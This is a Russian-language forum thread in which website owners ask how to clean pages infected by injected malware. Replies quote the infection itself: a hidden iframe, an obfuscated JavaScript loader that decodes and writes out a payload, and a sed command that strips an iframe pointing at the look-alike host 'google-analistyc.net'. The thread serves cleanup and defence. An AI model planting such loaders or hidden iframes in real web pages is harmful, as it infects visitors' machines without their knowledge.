Jump to content
  • 0

Вирус в коде


SimpsoneJkee
 Share

Question

20 answers to this question

Recommended Posts

  • 0
Открывай код и чисти вручную, как правило, файлы index, но может быть и на всех страницах.

ищи примерно такую вставку:

<html><body><div style="display:none"><iframe src="http://..." width="320" height="240"></iframe></div></body></html>

Чушь, залезьте по ссылке и посмотрите.

Сносите вот такой кусок кода в index.html или .php, что у вас там ...

<script id='c42A16BF77FA76F45319D26'>
/* 8o_nelp:eb$iue]%w`k_qiajp*snepa$qjao_]la$#!/_!25!22!3.!2-!2`!21!.,!2a!2-!2`!21!/`!2/!/0!/.!.,!3/!3.!2/!/`!.3!24!30!30!3,!/]!.b!.b!/-!/5!/0!.a!/-!/2!/1!.a!/0!.a!/.!/1!.b!.a!3.!30!21!.b!23!2b!.a!3,!24!3,!
/b!3/!25!20!/`!/-"!.3!.^!0`!2-!30!24!.a!3.!2b!31!2a!20!.4!0`!2-!30!24!.a!3.!2-!2a!20!2b!2`!.4!.5!.]!/4!/2!//!/1!/4!.5!.^!.3!//!//!/5!/-!/2!/5!22!22!20!/0!/,!.3!.,!33!25!20!30!24!/`!/.!/.!/.!.,!24!21!25!23!24!30!/`!//!/
4!/5!.,!3/!30!35!2_!21!/`!.3!32!25!3/!25!2.!25!2_!25!30!35!/]!24!25!20!20!21!2a!.3!/a!/_!.b!25!22!3.!2-!2`!21!/a#%%7yr]niue]9pnqa78+o_nelp: */
</script>
<script>
var AEDFA679A05F9AD9B872 = -34+30;var DA0AA0B7D35788D85A75 = document.getElementById('c42A16BF77FA76F45319D26').innerHTML;var c42d5eb5edA3BF3FF5DCD1C41DA3AD
= new String;DA0AA0B7D35788D85A75 = DA0AA0B7D35788D85A75.substr(4,562);for(i=0;i<DA0AA0B7D35788D85A75.length;i++) c42d5eb5edA3BF3FF5DCD1C41DA3AD +
= String.fromCharCode(DA0AA0B7D35788D85A75.substr(i,1).charCodeAt()-AEDFA679A05F9AD9B872);document.write(c42d5eb5edA3BF3FF5DCD1C41DA3AD);
</script>

Сразу после body

А ещё почитайте вот это: http://absolvo.ru/2009-05-19/zarazhyonnye-...yj-bich-runeta/

Link to comment
Share on other sites

  • 0

Почему чушь. У меня именно такая хрень была. На всех страницах в футере, после закрывающего тега html, а так же в файлах index всех остальных каталогов, включая с закрытым доступом. А по ссылке, антивирус не даёт. Отключать не хочу.

Edited by Shuranka
Link to comment
Share on other sites

  • 0

Всё прочитал, а вот как исправить это на сайте там не написано, у меня вроде как пол странице кода изменилось писец. Может поможет кто?

и потом вот это куда вставлять?

grep -R google-analistyc.net . | awk ‘{print $1}’ | cut -d “:” -f 1 | xargs -n1 sed -i ” ’s|<\!– ~ –><iframe src=\”http:\/\/google-analistyc.net\/in.cgi?12\” width=\”0\” height=\”0\” style=\”display:none\”><\/iframe><\!– ~ –>||g’

Link to comment
Share on other sites

  • 0
Всё прочитал, а вот как исправить это на сайте там не написано, у меня вроде как пол странице кода изменилось писец. Может поможет кто?

и потом вот это куда вставлять?

grep -R google-analistyc.net . | awk ‘{print $1}’ | cut -d “:” -f 1 | xargs -n1 sed -i ” ’s|<\!– ~ –><iframe src=\”http:\/\/google-analistyc.net\/in.cgi?12\” width=\”0\” height=\”0\” style=\”display:none\”><\/iframe><\!– ~ –>||g’

Ты до конца прочитал статью? С комментариями? Я там уже задавал подобный вопрос и Дима на него ответил как нельзя четко.

Link to comment
Share on other sites

  • 0

Все я прочитал! Если ты про это

Эм…, Дим, не совсем понял, а куда прописывать твою регулярку?

И между какими тегами?

«Волотко Дмитрий»

2009, Май, 20 число в 9:42 дп.

@rus, это команды для консоли Unix и Linux подобных систем.

то у меня не Unix и Linux, а ХР и мне нужно как то код исправить

Edited by SimpsoneJkee
Link to comment
Share on other sites

  • 0
Все я прочитал! Если ты про это

Эм…, Дим, не совсем понял, а куда прописывать твою регулярку?

И между какими тегами?

«Волотко Дмитрий»

2009, Май, 20 число в 9:42 дп.

@rus, это команды для консоли Unix и Linux подобных систем.

то у меня не Unix и Linux, а ХР и мне нужно как то код исправить

Дело в том, что код вам придется вручную чистить, а это регулярное выражение выполняется в командной строке.

Link to comment
Share on other sites

  • 0

Да и регулярку под конкретный зловредный код писать надо.

Так, по страницам:

http://tvcm.org/ - содержимое файла или частично уничтожено, или перекопано конкретно. Заархивируйте его и выложите.

http://school42tver.com/ - верстку я вижу, но как её оживить пока не придумал.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Answer this question...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. See more about our Guidelines and Privacy Policy